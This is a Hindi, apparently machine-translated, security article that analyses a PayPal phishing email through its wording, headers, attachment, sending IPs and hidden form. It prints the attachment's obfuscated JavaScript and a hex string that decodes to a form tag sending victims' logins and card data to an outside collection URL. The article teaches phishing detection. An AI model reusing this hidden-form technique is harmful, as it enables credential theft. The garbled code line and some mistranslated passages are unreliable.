मुखपृष्ठ » कैसे » एक फ़िशिंग ईमेल के एनाटॉमी को तोड़कर ऑनलाइन सुरक्षा

    एक फ़िशिंग ईमेल के एनाटॉमी को तोड़कर ऑनलाइन सुरक्षा


    आज की दुनिया में जहां हर किसी की जानकारी ऑनलाइन है, फ़िशिंग सबसे लोकप्रिय और विनाशकारी ऑनलाइन हमलों में से एक है, क्योंकि आप हमेशा एक वायरस को साफ कर सकते हैं, लेकिन यदि आपके बैंकिंग विवरण चोरी हो गए हैं, तो आप मुसीबत में हैं। यहां हमें मिले ऐसे एक हमले का तोड़ है.

    ऐसा मत सोचो कि यह सिर्फ आपके बैंकिंग विवरण हैं जो महत्वपूर्ण हैं: आखिरकार, यदि कोई व्यक्ति आपके खाते के लॉगिन पर नियंत्रण प्राप्त करता है, तो वे न केवल उस खाते में निहित जानकारी को जानते हैं, बल्कि संभावना यह है कि एक ही लॉगिन जानकारी का उपयोग विभिन्न अन्य पर किया जा सकता है हिसाब किताब। और अगर वे आपके ईमेल खाते से समझौता करते हैं, तो वे आपके सभी अन्य पासवर्ड रीसेट कर सकते हैं.

    तो मजबूत और अलग-अलग पासवर्ड रखने के अलावा, आपको हमेशा वास्तविक चीज़ के रूप में फर्जी ईमेल के लिए तलाश में रहना होगा। जबकि अधिकांश फ़िशिंग प्रयास शौकिया होते हैं, कुछ लोग काफी आश्वस्त होते हैं इसलिए यह समझना महत्वपूर्ण है कि सतह के स्तर पर उन्हें कैसे पहचानना है और साथ ही साथ वे हूड के तहत कैसे काम करते हैं.

    छवि asirap द्वारा

    प्लेन साइट में क्या है, इसकी जांच करना

    अधिकांश फ़िशिंग प्रयासों की तरह हमारा उदाहरण ईमेल, आपके पेपल खाते की गतिविधि की "सूचना" देता है, जो सामान्य परिस्थितियों में, खतरनाक होगी। अतः कॉल टू एक्शन को केवल आपके द्वारा सोची गई प्रत्येक व्यक्तिगत जानकारी के बारे में सबमिट करके अपने खाते को सत्यापित / पुनर्स्थापित करना है। फिर, यह सुंदर फार्मूला है.

    हालांकि निश्चित रूप से अपवाद हैं, बहुत अधिक हर फ़िशिंग और स्कैम ईमेल सीधे संदेश में लाल झंडे के साथ भरी हुई है। यहां तक ​​कि अगर पाठ आश्वस्त है, तो आप आम तौर पर पूरे संदेश में कई गलतियां पा सकते हैं जो यह संकेत देते हैं कि संदेश वैध नहीं है.

    द मैसेज बॉडी

    पहली नज़र में, यह मेरे द्वारा देखे गए बेहतर फ़िशिंग ईमेलों में से एक है। कोई वर्तनी या व्याकरण संबंधी गलतियाँ नहीं हैं और क्रिया जो आप उम्मीद कर सकते हैं, उसके अनुसार पढ़ता है। हालाँकि, कुछ लाल झंडे हैं जिन्हें आप तब देख सकते हैं जब आप सामग्री की थोड़ी और बारीकी से जाँच करेंगे.

    • "पेपैल" - सही मामला "पेपैल" (राजधानी पी) है। आप देख सकते हैं कि संदेश में दोनों विविधताएं उपयोग की जाती हैं। कंपनियां अपने ब्रांडिंग के साथ बहुत जानबूझकर हैं, इसलिए यह संदिग्ध है कि इस तरह से प्रूफिंग प्रक्रिया पारित हो जाएगी.
    • "ActiveX की अनुमति दें" - आपने कितनी बार वैध वेब आधारित व्यवसाय देखा है, जो कि पीपल का आकार एक मालिकाना घटक का उपयोग करता है जो केवल एक ही ब्राउज़र पर काम करता है, खासकर जब वे कई ब्राउज़रों का समर्थन करते हैं? ज़रूर, कहीं न कहीं कोई कंपनी ऐसा करती है, लेकिन यह लाल झंडा है.
    • "सुरक्षित रूप से।" - ध्यान दें कि यह शब्द कैसे पैराग्राफ के बाकी हिस्सों के साथ मार्जिन में नहीं है। यहां तक ​​कि अगर मैं खिड़की को थोड़ा और बढ़ाता हूं, तो यह सही ढंग से लपेट या जगह नहीं लेता है.
    • "पेपैल!" - विस्मयादिबोधक चिह्न से पहले अंतरिक्ष अजीब लग रहा है। बस एक और क्विक जो मुझे यकीन है कि एक कानूनी ईमेल में नहीं होगा.
    • "PayPal- खाता अपडेट फ़ॉर्म। Pdf.htm" - पेपैल विशेष रूप से एक "पीडीएफ" क्यों संलग्न करेगा जब वे सिर्फ अपनी साइट पर एक पृष्ठ से लिंक कर सकते हैं? इसके अतिरिक्त, वे PDF के रूप में HTML फ़ाइल को छिपाने का प्रयास क्यों करेंगे? यह उन सभी का सबसे बड़ा लाल झंडा है.

    द मैसेज हैडर

    जब आप संदेश हेडर पर एक नज़र डालते हैं, तो कुछ और लाल झंडे दिखाई देते हैं:

    • पते से [email protected] है.
    • पता गायब है। मैंने इसे खाली नहीं किया, यह केवल मानक संदेश हेडर का हिस्सा नहीं है। आमतौर पर एक कंपनी जिसके पास आपका नाम है वह आपको ईमेल को निजीकृत कर देगी.

    संलगन

    जब मैं अनुलग्नक खोलता हूं, तो आप तुरंत देख सकते हैं कि लेआउट सही नहीं है क्योंकि यह शैली की जानकारी गायब है। फिर से, पेपाल एक HTML फॉर्म क्यों ईमेल करता है जब वे आपको अपनी साइट पर एक लिंक दे सकते हैं?

    ध्यान दें: हमने इसके लिए Gmail के बिल्ट-इन HTML अटैचमेंट व्यूअर का उपयोग किया है, लेकिन हम अनुशंसा करेंगे कि आप स्कैमर से संलग्न न करें। कभी नहीँ। कभी। उनमें अक्सर ऐसे शोषण होते हैं जो आपके खाते की जानकारी चुराने के लिए आपके पीसी पर ट्रोजन स्थापित करेंगे.

    थोड़ा और नीचे स्क्रॉल करने पर आप देख सकते हैं कि यह फ़ॉर्म न केवल हमारी पेपल लॉगिन जानकारी, बल्कि बैंकिंग और क्रेडिट कार्ड की जानकारी भी माँगता है। कुछ चित्र टूटे हुए हैं.

    यह स्पष्ट है कि यह फ़िशिंग प्रयास एक झपट्टा के साथ सब कुछ के बाद हो रहा है.

    तकनीकी खराबी

    हालांकि यह स्पष्ट होना चाहिए कि यह स्पष्ट दृष्टि में है कि यह एक फ़िशिंग प्रयास है, हम अब ईमेल के तकनीकी मेकअप को तोड़ने जा रहे हैं और देखें कि हम क्या पा सकते हैं.

    अटैचमेंट से जानकारी

    सबसे पहले एक नज़र डालते हैं, अटैचमेंट फॉर्म का HTML स्रोत जो डेटा को बोगस साइट में जमा करता है.

    जब स्रोत को जल्दी से देखते हैं, तो सभी लिंक वैध दिखाई देते हैं क्योंकि वे "paypal.com" या "paypalobjects.com" को इंगित करते हैं, जो दोनों वैध हैं.

    अब हम पृष्ठ पर फ़ायरफ़ॉक्स को इकट्ठा करने वाले कुछ बुनियादी पेज की जानकारी लेने जा रहे हैं.

    जैसा कि आप देख सकते हैं, कानूनी पेपल डोमेन के बजाय "ग्राफिक्स" से कुछ डोमेन "आशीर्वाद", "goodhealthpharmacy.com" और "pic-upload.de" डोमेन से खींचे जाते हैं.

    ईमेल हेडर से जानकारी

    आगे हम कच्चे ईमेल संदेश हेडर पर एक नज़र डालेंगे। जीमेल संदेश पर शो मूल मेनू विकल्प के माध्यम से यह उपलब्ध कराता है.

    मूल संदेश के लिए हेडर की जानकारी को देखते हुए, आप देख सकते हैं कि यह संदेश आउटलुक एक्सप्रेस 6 का उपयोग करके बनाया गया था। मुझे संदेह है कि पेपल में कोई कर्मचारी है जो इन संदेशों में से प्रत्येक को एक पुराने ईमेल क्लाइंट के माध्यम से मैन्युअल रूप से भेजता है।.

    अब रूटिंग जानकारी को देखते हुए, हम प्रेषक और रिले मेल सर्वर दोनों के आईपी पते को देख सकते हैं.

    "उपयोगकर्ता" आईपी पता मूल प्रेषक है। आईपी ​​सूचना पर त्वरित खोज करते हुए, हम देख सकते हैं कि भेजने वाला आईपी जर्मनी में है.

    और जब हम रिले मेल सर्वर (mail.itak.at) को देखते हैं, तो आईपी एड्रेस हम देख सकते हैं कि यह ऑस्ट्रिया में स्थित एक आईएसपी है। मुझे संदेह है कि पेपल अपने ईमेल को सीधे ऑस्ट्रिया स्थित आईएसपी के माध्यम से भेजता है जब उनके पास एक बड़े पैमाने पर सर्वर फार्म होता है जो आसानी से इस कार्य को संभाल सकता है.

    डेटा कहाँ जाता है?

    इसलिए हमने स्पष्ट रूप से निर्धारित कर दिया है कि यह एक फ़िशिंग ईमेल है और इस बारे में कुछ जानकारी एकत्र की है कि संदेश कहाँ से उत्पन्न हुआ है, लेकिन आपका डेटा कहां भेजा गया है, इसके बारे में क्या है?

    इसे देखने के लिए, हमें पहले एचटीएमएल अटैचमेंट को अपने डेस्कटॉप को सेव करना होगा और टेक्स्ट एडिटर में ओपन करना होगा। इसके माध्यम से स्क्रॉल करना, सब कुछ क्रम में प्रतीत होता है सिवाय जब हम एक संदिग्ध दिखने वाले जावास्क्रिप्ट ब्लॉक को प्राप्त करते हैं.

    जावास्क्रिप्ट के अंतिम ब्लॉक का पूरा स्रोत तोड़कर, हम देखते हैं:


    // कॉपीराइट © 2005 वोर्मेडिया - WWW.VOORMEDIA.COM
    var i, y, x = ”3c666f726d206e616d653d226d61696e2220693646d61696e22206d657468664646d6646226226466466466466646226646d6226d6x6d6d2d2d2b2b8&f=a2&f=h=7752d2&f=h2&hl=hi ##########।

    किसी भी समय आप जावास्क्रिप्ट ब्लॉक में एम्बेडेड प्रतीत होने वाले यादृच्छिक अक्षरों और संख्याओं का एक बड़ा जंबल्ड स्ट्रिंग देखते हैं, यह आमतौर पर कुछ संदिग्ध होता है। कोड को देखते हुए, चर "x" इस बड़े स्ट्रिंग पर सेट किया गया है और फिर चर "y" में डिकोड किया गया है। चर "y" का अंतिम परिणाम तब दस्तावेज के रूप में HTML में लिखा जाता है.

    चूंकि बड़ी स्ट्रिंग 0-9 संख्याओं और अक्षरों ए-एफ से बनी होती है, इसलिए यह संभवतः सबसे सरल ASCII के माध्यम से हेक्स रूपांतरण में एन्कोड किया जाता है:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    इसके लिए अनुवाद:

    यह एक संयोग नहीं है कि यह एक वैध एचटीएमएल फॉर्म टैग में डिकोड करता है, जो पेपल को नहीं, बल्कि एक रोमिंग साइट पर परिणाम भेजता है।.

    इसके अतिरिक्त, जब आप प्रपत्र के HTML स्रोत को देखते हैं, तो आप देखेंगे कि यह प्रपत्र टैग दृश्यमान नहीं है क्योंकि यह जावास्क्रिप्ट के माध्यम से गतिशील रूप से उत्पन्न होता है। यह छिपाने का एक चतुर तरीका है कि एचटीएमएल वास्तव में क्या कर रहा है अगर कोई व्यक्ति केवल अनुलग्नक के उत्पन्न स्रोत को देखने के लिए था (जैसा कि हमने पहले किया था) एक पाठ संपादक में सीधे संलग्नक को खोलने के विपरीत।.

    आपत्तिजनक साइट पर एक त्वरित whois चला रहे हैं, हम देख सकते हैं कि यह एक लोकप्रिय वेब होस्ट, 1and1 पर होस्ट किया गया डोमेन है.

    जो खड़ा है वह है डोमेन एक पठनीय नाम का उपयोग करता है (जैसा कि "dfh3sjhskjhw.net" के विपरीत है) और डोमेन 4 साल के लिए पंजीकृत किया गया है। इस वजह से, मेरा मानना ​​है कि इस डोमेन को इस फ़िशिंग प्रयास में मोहरा के रूप में इस्तेमाल किया गया था.

    निंदक एक अच्छा बचाव है

    जब यह ऑनलाइन सुरक्षित रहने की बात आती है, तो यह कभी भी निंदक का अच्छा दर्द नहीं होता है.

    हालांकि मुझे यकीन है कि उदाहरण ईमेल में अधिक लाल झंडे हैं, हमने ऊपर जो संकेत दिए हैं वे संकेतक हैं जिन्हें हमने परीक्षा के कुछ मिनट बाद देखा था। हाइपोथेटिक रूप से, यदि ईमेल की सतह का स्तर अपने वैध समकक्ष 100% की नकल करता है, तो तकनीकी विश्लेषण अभी भी इसकी वास्तविक प्रकृति को प्रकट करेगा। यही कारण है कि यह आयात करने में सक्षम है कि आप क्या देख सकते हैं और क्या नहीं देख सकते हैं.